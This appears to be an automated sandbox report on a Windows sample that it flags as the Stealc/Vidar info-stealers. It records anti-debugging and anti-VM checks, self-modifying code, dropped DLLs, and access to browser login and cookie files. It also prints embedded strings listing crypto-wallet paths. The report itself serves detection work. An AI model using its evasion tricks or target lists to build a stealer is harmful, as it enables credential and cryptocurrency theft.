Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82E14E second address: 82E15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9498E4A77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C02A4 second address: 50C0319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d movzx ecx, bx 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F94990FE578h 0x00000018 mov edi, ecx 0x0000001a pop eax 0x0000001b pushfd 0x0000001c jmp 00007F94990FE577h 0x00000021 or esi, 667B4A4Eh 0x00000027 jmp 00007F94990FE579h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov ecx, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0319 second address: 50C031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C031E second address: 50C034C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F94990FE56Dh 0x00000013 pop eax 0x00000014 mov bx, BFD4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0374 second address: 50C0391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 push ebp 0x00000008 jmp 00007F9498E4A77Ch 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0391 second address: 50C0397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0397 second address: 50C039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C039D second address: 50C03A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03A1 second address: 50C03BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9498E4A77Ah 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03BC second address: 50C03C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C03C0 second address: 50C03C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 749B20 second address: 749B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0B30 second address: 50C0B36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0B36 second address: 50C0B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F94990FE574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F94990FE56Bh 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F94990FE570h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0B6F second address: 50C0B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0B73 second address: 50C0B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0B79 second address: 50C0BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, D9h 0x00000005 jmp 00007F9498E4A789h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F9498E4A77Eh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9498E4A787h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50C0BC4 second address: 50C0BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 73D4B2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 767C0E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 74FFE8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5A1914 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7C9A0A instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00354910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0034E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0034BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00353EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00353EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_003416D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_003538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_003538B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0034ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00354570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00354570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0034DE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00341160 GetSystemInfo,ExitProcess,

0_2_00341160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1993328711.00000000012A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: file.exe, 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-14426
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13290
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13239
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13236
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13258
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-13250

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003445C0

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359750 mov eax, dword ptr fs:[00000030h]

0_2_00359750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: file.exe, 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: D{'Program Manager
Source: file.exe	Binary or memory string: D{'Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00357B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00356920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00357A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1993328711.000000000125E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764315885.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7596, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1993328711.00000000012B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1993328711.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
